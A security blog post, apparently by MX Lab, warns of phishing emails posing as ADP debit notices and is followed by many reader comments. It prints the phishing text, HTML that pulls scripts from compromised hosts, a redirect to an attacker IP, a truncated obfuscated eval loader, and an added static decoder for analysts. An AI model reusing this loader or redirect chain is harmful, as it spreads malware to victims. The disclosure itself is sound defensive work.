Emails with subject “ADP Funding Notification – Debit Draft” are a security risk


MX Lab, http://www.mxlab.eu, has intercepted some emails with the subject “ADP Funding Notification – Debit Draft” that lead to a malicious web site serving obfuscated JavaScript code.

The email is sent from the spoofed address “ADP_FSA_Services@ADP.com” or “ADPClientServices@adp.com” and has the following body:

Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.

Thank You,

ADP Benefit Services

The link does not lead to the site shown in the message but to hxxp://www.avrakougioumtzi.gr/PQB6j3HW/index.html, which serves the following HTML:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type="text/javascript" src="hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js"></script>
<script type="text/javascript" src="hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js"></script>

</html>

Both embedded JavaScript files redirect the browser with document.location='hxxp://173.255.228.171/getfile.php?u=853fda24';

That location serves the obfuscated JavaScript below while the browser shows “Waiting for redirect…”.

<html><body><script>try{v=prototype&5;}catch(v){x=1;}z=function(){md="a";if(window.document)e="ev";c="";f="fromChar";
if(a)f=f+"Code";
d=10;
for(i=15027-1;i>=0;i--){
w=i;
v=a[w];
k=v/((15027-i-1)%d+2);
c+=String[f](k);
}
e+="al";
if(x)window[e](c);}
g="";
if(x)g+="472.287.240.240.432.336.230.1375.590.369.384.336.288.280.176.348.198.1111.1140.945.800.707.684.475.4"
______SHORTENED_____
if(x)g+="07.654.585.396.333.200";
a=g.split(".");
z(123);
</script></body></htm>
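
The loop in the sample above can be reproduced offline without eval(), so an analyst can read what the page would have run instead of executing it. This is an added example, not MX Lab's code: the function names `collectFragments` and `decodeDottedPayload` are hypothetical, and it assumes the hard-coded loop bound equals the number of tokens. It is run on the last five complete tokens of the sample.

```javascript
// Added example: static decoder for the dotted-number payload shown above.
// It reproduces the sample's arithmetic but never calls eval(); the hidden
// script is returned as text for inspection only.

// Join every g+="..." literal in a saved copy of the page. The sample splits
// numbers across literals, so fragments are concatenated with no separator.
function collectFragments(scriptSource) {
  const literal = /\bg\s*\+=\s*"([^"]*)"/g;
  let joined = "";
  for (const match of scriptSource.matchAll(literal)) {
    joined += match[1].replace(/\s+/g, ""); // drop line wraps inside a literal
  }
  return joined;
}

// Assumption: the hard-coded loop bound (15027 in the sample) equals the token
// count, so (15027 - i - 1) is the token's distance from the end of the array.
function decodeDottedPayload(encoded, cycle = 10, base = 2) {
  const tokens = encoded.split(".").filter((t) => t.length > 0);
  const suspect = [];
  let text = "";
  // The array is walked backwards: the last token is the first character.
  for (let i = tokens.length - 1; i >= 0; i--) {
    const divisor = ((tokens.length - 1 - i) % cycle) + base; // 2,3,...,11,2,...
    const code = /^\d+$/.test(tokens[i]) ? Number(tokens[i]) / divisor : NaN;
    const printable = code === 9 || code === 10 || code === 13 ||
      (code >= 32 && code < 127);
    if (!Number.isInteger(code) || !printable) {
      // A token that does not divide evenly, or decodes to a control byte,
      // points to a truncated or misaligned sample rather than real script.
      suspect.push({ index: i, token: tokens[i], divisor });
      text += "?";
      continue;
    }
    text += String.fromCharCode(code);
  }
  return { text, suspect };
}

// Last five complete tokens of the page's sample.
const PAGE_TAIL = "654.585.396.333.200";
// Constructed: the same tail split over two literals, as the sample does.
const CONSTRUCTED_SOURCE = 'if(x)g+="654.585.";\nif(x)g+="396.333.200";';

const clean = decodeDottedPayload(collectFragments(CONSTRUCTED_SOURCE));
// The page's tail including the token cut by the shortening marker ("07").
const damaged = decodeDottedPayload("07." + PAGE_TAIL);

console.log(clean.text, clean.suspect.length);
console.log(damaged.text, damaged.suspect);
```

The tail decodes to the opening characters of the hidden script, and the token cut by the shortening marker is reported as suspect instead of being silently turned into a control character.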

104 Responses to Emails with subject “ADP Funding Notification – Debit Draft” are a security risk

  1. biggie says:

    got this message today. the spooky part is they emailed me and cc’d my business partner so it took some smarts to put all that together.

  2. Billy p says:

    I received two copies.

  3. Bee says:

    thanks for the info. I received 2 emails within 30 minutes of each other. Thankfully my malware would not let me access the website.

  4. oscar says:

    Hopefully my bank account doesn’t get debited. I never signed up for adp.

  5. SE says:

    Just received this email myself. Grateful for all of the vigilant spam watchdogs out there.

    • Isobel Dick says:

      I also received this on 29/9/2012 and they also debited our business account on the 4th October 2012 and I am now trying to get them to put the money back. never signed up for this either.

      • sandy says:

        Guys please tell me will they actually debit my account, anyone there who lost money due to this silly thing? am going to run to the bank & transfer my money to another account OMG am so freaked out. We don’t have privacy in this cruel world :(

      • Judy mexted says:

        I have received this email today 13/10/12 on my iPad and it is a weekend however am freaked out as to whether they will take money from my account. I have never heard of these people. Who do I report this to?

      • Paula says:

        I received this on October 15 and they managed to take $175.00 from my checking account. I disputed it with my bank and after checking they say it is “legitimate”, but I am contesting that and requiring them to send me the documentation. This is a nightmare. I think I should change my checking account because I’m afraid it will happen again monthly every month on the 15th? Has anyone had any luck getting their bank to reverse these charges permanently. Fifth Third only reversed it for 30 days then put it back on again when they said it was “legitimate.” Bulls^*#( this was NEVER authorized by me.

  6. Denise says:

    Yes, thank you to all of you who help us daily know what is safe and what is not!!! We appreciate you.

  7. Mike says:

    I wanted to say thanks as well. I suspected it to be a phishing email, but it’s nice to be able to get such quick validation through sites like this.

  8. Don Bible says:

    This is what I love about the internet. I just got one of these and the watchdogs are already on it. Thanks

  9. Shirley Knuckey says:

    My ADP Email had the subject-line. ADP Generated Message: First Notice – Digital Certificate Expiration. I am relieved to find this support site. I still don’t know how to truly avoid these invaders as they become more and more sneaky in faking an authentic-looking address.

  10. Terry Gong says:

    Thank You
    It fell into my junk mail

  11. Pingback: New email bases threats based on obfuscated Javascript in Rabobank emails « mxlab – all about anti virus and anti spam

  12. Deborah says:

    Thank you to the watchdogs.

  13. Carla says:

    this went into our regular email as ADPClientServices, did not look right so I called ADP directly I was informed they would never send an email with another link it would be directly to their website. SO Delete, Delete, Delete!

  14. Chris says:

    Got one today. I immediately googled “ADP Funding Notification” which led me here. Kudos for the article! Cheers!

  15. amar says:

    got a similar email today @ 3.17 p.m. Searched internet and found this discussion. Thanks to everybody who has posted. It does help a lot in weeding out the spam emails.

  16. Britt says:

    Is there an address to forward these spam e-mails to? I get them quite frequently, from PayPal too. They have me forward the fraudulent messages to “Spoof@paypal.com”

  17. Kamala Mattie says:

    Forward them to the Federal Trade Commission at spam@uce.gov.

  18. Gina says:

    I am glad I decided to Google who ADP was. I got this email on an infrequently used email so when it said it was going to debit my account, I was suspicious but didn’t want to click the link before checking out who the company was. Thank you posting this!

  19. Brenda says:

    I received one yesterday.

  20. gina says:

    I received one today as well, but realized it was a bogus email when I opened the “show details” and saw that it was sent to other emails that started with “gina”. googled the site and brought here. thank you.

  21. Thank you to all who posted. I received today on my business account and so did my boss

  22. Andrea says:

    I just received an email to my .mac account. Got concerned so did some research. Thank you for those who did all the research before I had to. I’m sick of these spammers. How do we stop the madness?

  23. Thanks for posting this. Just got one of these messages. Figured it was a phishing message. Googling brought me here to confirm my suspicions.

    • Arie says:

      Exactly the same here. Also googled. Thanks to you all.

    • I received one email from them today and I read your post that help me to know that it is a SPAM but I don’t know which account could be debited if I didn’t subscribe on anything with them… Is it only if you click on their link ? Is it on a credit card account or a bank account ? Thank you !

  24. Razi says:

    I got the email today and didn’t sign up

  25. cathy says:

    I got two emails today and forwarded to spam@uce.gov

  26. Kevin K says:

    Thank you all for posting this answer. I had just received the same email. I kinda figured it was a phishing scam so I Googled it before opening it and was happy to see all the post. Thanks!

  27. gillian says:

    and still it comes thought it was a scam
    thanks

  28. Matt says:

    I got it too – it was sent from A63A55B@friedbergdefense.com

    Dirty bleeding spammers!

  29. frank says:

    got it today. thanks for the info!

  30. angebala says:

    got it today. thanks for the info!

  31. David says:

    I also got one today…scary thing is I did have an ADP account through work but this email went straight to my spam box. Gonna forward it as well. Thanks for the info

  32. Autumn says:

    I got one a few minutes ago and googled the link they gave. Very glad to see this forum on it! Thanks a mil.

  33. Great says:

    I found this email today, but thanks for these comments for getting me know that, it’s a spam message

  34. maria says:

    Thanks! I got rid of it too!

  35. Suzee says:

    Thanks, immediate relief. You guys are great x

  36. Larry says:

    Had 2 of these spams in the past few days. One with Subject line “Debit Draft”, and the other “ADP Generated Message – Debit Draft”. Thanks for confirming my suspicions!

  37. patricia says:

    I have received many of these messages in recent days to I have not done them case; But today I get other BBB where tell me that my business has a complaint for failure to pay the ADP service.

  38. Liz says:

    I just received one with subject ADP Urgent Notification – your transaction report. The sender was: ADPClientServices D1B55477@ceccrushers.com It was caught in my SPAM filter.

  39. David says:

    I have received this email. Thankfully I googled it and found this site. Have deleted message now.
    Many thanks
    Dave

  40. banjo bunga says:

    I just got one, its what scares me bout internet ! are our banking details really safe?

  41. Sam says:

    Don’t know who ADP are and have no reason to debit my account. I hope they actually don’t have my bank details

  42. Mariela says:

    Is my bank acct really safe??

  43. Nichola says:

    what will happen if you click on the link which I have just done?

  44. Alan says:

    I’m getting three or four a day now, all from America, I been downgraded on their business ratings and now offered diplomas How can we stop these, I’m not sure how to block E-mails and my ESP are no help

  45. LaToya says:

    Also got this message twice In my spam mail. Never signed up for this! Will keep watch on my bank account for this just to be safe!

  46. Rupesh Kumar says:

    Today I received the same message from ‘ADP Alert ‘ with the following body:

    Your Transaction Report(s) have been uploaded to the web site:

    https://www.flexdirect.adp.com/client/login.aspx

    Please note that your bank account will be debited within one banking
    business day for the amount(s) shown on the report(s).

    Please do not respond or reply to this automated e-mail. If you have any
    questions or comments, please Contact your ADP Benefits Specialist.

    Thank You,
    ADP Benefit Services

    Should I inform to bank.

  47. erkan says:

    Good day, friends. I received the same messages too. They say I have a bank account. They say money will be withdrawn. What is this? What do you say about this? Regards..

  48. Lisa says:

    Scary isn’t it. It appears we dont touch it, straight up delete … single digit finger high in the air, to the swine that got our details to send. I’m glad I searched here first. I live on the same road, wondering what knowledge they have of my banking details and whether I should notify the bank. I’ll watch for someones savvy reply.

  49. Pingback: TechBuster | Get the latest news on the latest trending topics on TECHNOLOGY.

  50. Drew says:

    Yea…. got the same here … but was in my spam folder
    with this message attached:
    “Be careful with this message. Our systems couldn’t verify that this message was really sent by cparkerproperties.com. You might want to avoid clicking on links or replying with personal information. Learn more”

    so googled “https://www.flexdirect.adp.com” and came up with these notifications……

    looks like they are using various email addys to send now/……….
    r

  51. cw says:

    ADP does our payroll, and it was sent to my work email, which I don’t share anywhere but professional sites, so this was concerning. Now I wonder which company is “leaking” my contact info :(

  52. Gina says:

    They are still at it I received same today

  53. Wool says:

    I got the same e-mail.. but I clicked the link that sites on my mobile phone… is it okay? I am so nervous..:(

  54. The same here, also googled. Thanks to you all.

  55. SB says:

    I just received this email today and I’m so glad I googled it. Thank you. Immediately deleted it and added seller to spam.

  56. persille says:

    I received this today as well and have never had anything to do with ADP – I don’t even live in America. This is clearly spam/phishing attempts so it got deleted straight away, but it is rather scary how these people find and target you… Googled ADP however and it led me here, so thanks for the information. Be safe on the Internet.

  57. TML757 says:

    Yeah great work all, I poked around after getting this as well. They almost got me too because I just put in for a small business loan and I thought it had something to do with that lol always pays to look first!!

    • TML757 says:

      To all those worried about their bank accounts, from this email I would not worry. If they did already have your bank information they would not require you to click a link, they would just pretend to be some fake company and do an ACH withdraw on your account. Just be careful and google/delete any email that seem a little shady!

      • Paula says:

        I would definitely worry if I were you. I got the fake email and clicked on it because my previous employer used ADP so I thought it was legit. I’ve had $175.00 take “automatically debit” from my checking account in October. Did a “dispute” with my bank (Fifth Third) and they reversed it for 30 days while checking into it. Then they reversed it again and re-debited my account for the $175.00 because they said it was legit. I’m further disputing and asking for documentation. This is a nightmare!

  58. acetogrey says:

    I clicked on the link like an idiot, and immediately disconnected from the internet and ran my virus scan which has found nothing. I then searched the internet and found you… I should have searched first…

  59. Pingback: Heads up Spam alert, Emails with subject “ADP Funding Notification – Debit Draft” are a security risk | Englishman in Italy

  60. René Demuth says:

    I just received this email today and I’m so glad I googled it. Thank you.

  61. Corpsecrank says:

    I got this also but gmail put it directly in the spam and listed it with a warning. The warning directly mentioned not clicking any links in the email lol. I wouldn’t anyhow I didn’t recognize it and if they charged the bank I could easily dispute the charges anyhow.

  62. Beena says:

    I got this mail twice today. Please can anyone tell me, will they really debit my account?? I haven’t signed up for this & have never heard of or dealt with ADP before! There’s a link also but I didn’t click on it

  63. subhash says:

    Thanks for this site , a lot of people are scammed, but because of your dedication we can stay away from this kind of nonsense.. I am usually very careful and would not open emails that do not make sense..
    KUDOS people!!!!!

  64. icon_enroht@hotmail.com says:

    I just received this e-mail….can’t they stop these scammers?

  65. millie says:

    Received this spam today. This is work email account and the only thing I have used it for lately was to post a job on Craigslist. ???????????????????
    Thanks for your help.

  66. Kez says:

    I received this email today and clicked on the link, don’t know what I was thinking as I never open emails that I don’t trust, hope it does not take anything from my account

  67. Received a modified version this morning: 2 emails with “ADP Funding Notification” and “ADP Debit Draft” subject lines. The source and hyperlinks are different but essentially the same issue. Both display a hyperlink of “https://www.flexdirect.adp.com/client/login.aspx” but actually link to “hxxp://www.annorlimousine.com/4b2kMN/index.html” and “hxxp://daglimobilya.com/7dc5WT/index.html” respectively. I copy and paste links, I NEVER click a link in an email, especially one that is questionable. I contacted ADP and while on hold, found this blog and then they answered to confirm many have received such emails. This email originated from 109.93.41.77 (Serbia) according to the message header.

  68. Sara Cornell says:

    I’ve just got one too. I got worried not knowing who the company was and or how much was being debited from my account I clicked the link and it said ‘server’ in the top left corner so I clicked for the properties and it looked dodgy, was out of date and wouldn’t show certificates so I’ve closed it and googled it and came to this site… thanks very much everyone.
    Does anyone know if I’m at risk because I clicked the link even though it didn’t load??

    • C says:

      I just got one if these in my junk mail. Totally confused as ADP is the name of my dentist! Clicked in link on my phone it came up forbidden. Thank god. I googled and found these comments. Thanks all for posting.

    • @SaraCornell It fell into my Gmail spam folder but I looked at it in any case. Suspicions instantly raised by the lack of addressee or signature. Quick tip – copy and paste a key phrase of many words from the email and google it (perhaps adding the word “spam” to the search argument) if you’re uncertain – such action will lead you straight to sites like this one that help. I googled the link itself(!) and got this page. Quick tip number 2 – don’t click on links. Quick tip 3 – if your malware/AV scanner didn’t block the link, run a malware scan *now* from http://www.microsoft.com/security/scanner/en-gb/default.aspx (don’t trust this link? – search for “Microsoft Safety Scanner”) and upgrade your system to an AV/malware app that does work. ATB @PedroStephano

  69. Paul Harris says:

    Well now , nice to know we are not alone when problems hit us. However at 74 I still got me marbles and can punch these sort of things into touch, whilst not using the queens english .
    Thanks to this site set up I can refer my friends to check anything that is suspicious. Many thanks Google.

  70. Verna Ellis says:

    Just got one today, too. I don’t even know who ADP is. I will be going to my bank tomorrow morning to let them know to watch out for these nuts who are trying to steal my hard-earned money. This makes me nervous and angry!!! How dare they??? I am glad I found you all through Google. What a mess!!

  71. Panos Anadiotis says:

    Thank you!!

  72. Cormac says:

    Just like many others on this page I received one of these emails today. Googled it and found you guys. Thanks for confirming my suspicions! Great site.

  73. Linda Sine says:

    Received this today, opened, and after seeing that I was forbidden to open link, decided to search. Am I at risk? My credit unions are closed today, except for drive-thru…do I print this out and take it to them??? Do I have to worry about my tiny bank account? They’ll be pretty disappointed when they see what’s in there?? Do they want my last $10.00?? I also received an e-mail from “Wire Transfer Confirmation (FED_7811t33836)….is this related??

  74. Gianni says:

    HI, SAME TO ME , I received this one today 13 october 2012:

    FROM: ADPClientServices@adp.com

    Your Transaction Report(s) have been uploaded to the web site:

    https://www.flexdirect.adp.com/client/login.aspx

    Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
    …..

    BUT INDEED THE ABOVE LINK WOULD BRING YOU TO http://kas-emlan.com/

  75. John S says:

    I received same on 12th October & left in “Junk”. Didn’t do anything with it until today. Googled & found you, so have deleted without going to link. Thanks for the info.

  76. eliza says:

    Received 2 emails on this ADP Funding Notification which I am not familiar with. I have called my bank and apparently they are also not sure about this ADP Funding Notification. My advice to delete and totally ignore this email.

  77. Jurgen says:

    Same here, got one yesterday and did not click on anything. First thing this morning, notified my bank to NOT actuate any transaction without my specific consent. They had never heard of this spam. Glad I found this site when I googled the ADPClient Services. Pheew!!

  78. Anne says:

    Thanks to the person/persons who set up this site and to everyone who posted about ADP e-mail. I found it in my spam folder and as in the middle of setting up a business and dealing with a lot of stuff thought a ‘proper’ message had slipped into spam folder. Stupidly (specially stupid of me as I’m an IT contractor!!) clicked on the link and thankfully got internet can’t open this page message – phew! Googled and found this site.

  79. tas says:

    hello,

    I opened this message and tried to reply but bounced back….I am now concerned that someone may have my details is this possible?? esp if it bounced back.

    the email contained adp will be debiting my account within one working day can someone help?

  80. Wendy says:

    This is the one that I got…
    Your latest ADP Services Invoice is now available to view or pay online at ADP Online Invoice Management .

    To protect the security of your data, you will need to enter your ID and password, then click on Access your Online Invoice Management Account.

    Total amount due by October 11, 2012

    $42571.85

    If you have already sent your payment please disregard this friendly reminder and Thank you for choosing ADP.

    Questions about your bill?

    Contact your ADP administrator by Secure Mail.

    Note: This is an automated email. Please do not reply.

    They don’t have to worry about me replying…..or paying either!! Sure hope that nobody gets duped by this

  81. suej999 says:

    Just got that email–although when I hovered over the link, it went to some wholesaleshoewarehouse dot something.. I didn’t click of course!!

  82. Debbie Bentley says:

    Well..I received mine on Oct 12 and decided to clean my mailbox this morning before work. I, like an idiot clicked it cause I couldn’t figure out what amt they were talking about because I hadn’t transferred any money for about 3 weeks. The page that came up was a “page cannot be found” page. So I hope I am safe here. I’m usually not that stupid….but that’s what happens when you clean your box at 5 a.m. and forget to have coffee first. Thanks to the watchdogs Debbie Vancouver Island Canada

  83. Judy L. Holm says:

    we got one in Oct. Didn’t lose anything. There are so many bad people. Glad I found you today.

  84. Jaclyn says:

    I just got one of these on my work email. I have never signed up for this, so how do I know if my account is okay? I did not click on the link so they have no valuable information as far as I know. Should I email my bank?
